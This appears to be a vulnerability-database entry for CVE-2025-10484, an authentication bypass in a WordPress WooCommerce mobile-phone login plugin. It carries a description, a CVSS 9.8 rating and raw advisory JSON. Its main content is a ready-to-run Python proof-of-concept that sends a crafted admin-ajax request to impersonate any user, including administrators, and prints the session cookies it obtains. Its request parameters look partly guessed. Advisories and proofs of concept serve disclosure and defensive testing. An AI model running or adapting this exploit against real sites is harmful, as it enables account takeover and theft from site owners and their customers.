Security Vulnerability Report
中文
CVE-2025-10484 CVSS 9.8 CRITICAL

CVE-2025-10484

Published: 2026-01-17 09:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a users identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Registration & Login with Mobile Phone Number for WooCommerce <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-10484 PoC - Authentication Bypass in WooCommerce Mobile Phone Login Plugin Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys from urllib.parse import urljoin def exploit_auth_bypass(target_url, target_username): """ Exploit the authentication bypass vulnerability in fma_lwp_set_session_php_fun() by directly setting session for target user without password verification. """ # Target the AJAX endpoint used by the plugin ajax_endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php') # Payload to trigger fma_lwp_set_session_php_fun() with target username # The vulnerability allows setting session without proper authentication payload = { 'action': 'fma_lwp_set_session', # Plugin AJAX action 'username': target_username, # Target user to impersonate 'phone_number': '', # Empty phone number bypasses verification 'method': 'set_session' # Direct session manipulation } try: print(f'[*] Attempting authentication bypass for user: {target_username}') print(f'[*] Target URL: {ajax_endpoint}') # Send malicious request response = requests.post( ajax_endpoint, data=payload, headers={ 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' }, timeout=30, allow_redirects=False ) # Check for successful session creation indicators if response.status_code == 200: cookies = response.cookies if cookies: print(f'[+] SUCCESS: Authentication bypassed!') print(f'[+] Obtained session cookies: {dict(cookies)}') print(f'[*] You can now use these cookies to access the site as {target_username}') return True # Alternative check: look for session token in response if 'session' in response.text.lower() or 'success' in response.text.lower(): print(f'[+] SUCCESS: Session data received') print(f'[*] Response: {response.text[:500]}') return True print(f'[-] Failed to bypass authentication') print(f'[*] Status code: {response.status_code}') print(f'[*] Response: {response.text[:500]}') return False except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return False def main(): if len(sys.argv) < 3: print('Usage: python cve-2025-10484-poc.py <target_url> <username>') print('Example: python cve-2025-10484-poc.py https://example.com admin') sys.exit(1) target_url = sys.argv[1].rstrip('/') target_username = sys.argv[2] exploit_auth_bypass(target_url, target_username) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10484", "sourceIdentifier": "[email protected]", "published": "2026-01-17T09:15:50.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a users identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password."}, {"lang": "es", "value": "El plugin Registration &amp; Login with Mobile Phone Number para WooCommerce para WordPress es vulnerable a la omisión de autenticación en todas las versiones hasta la 1.3.1, inclusive. Esto se debe a que el plugin no verifica correctamente la identidad de un usuario antes de autenticarlo a través de la función fma_lwp_set_session_php_fun(). Esto hace posible que atacantes no autenticados se autentiquen como cualquier usuario del sitio, incluidos los administradores, sin una contraseña válida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://woocommerce.com/products/registration-login-with-mobile-phone-number/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6aef6fbb-be8c-49e1-ada5-7b4aa8b2ff72?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.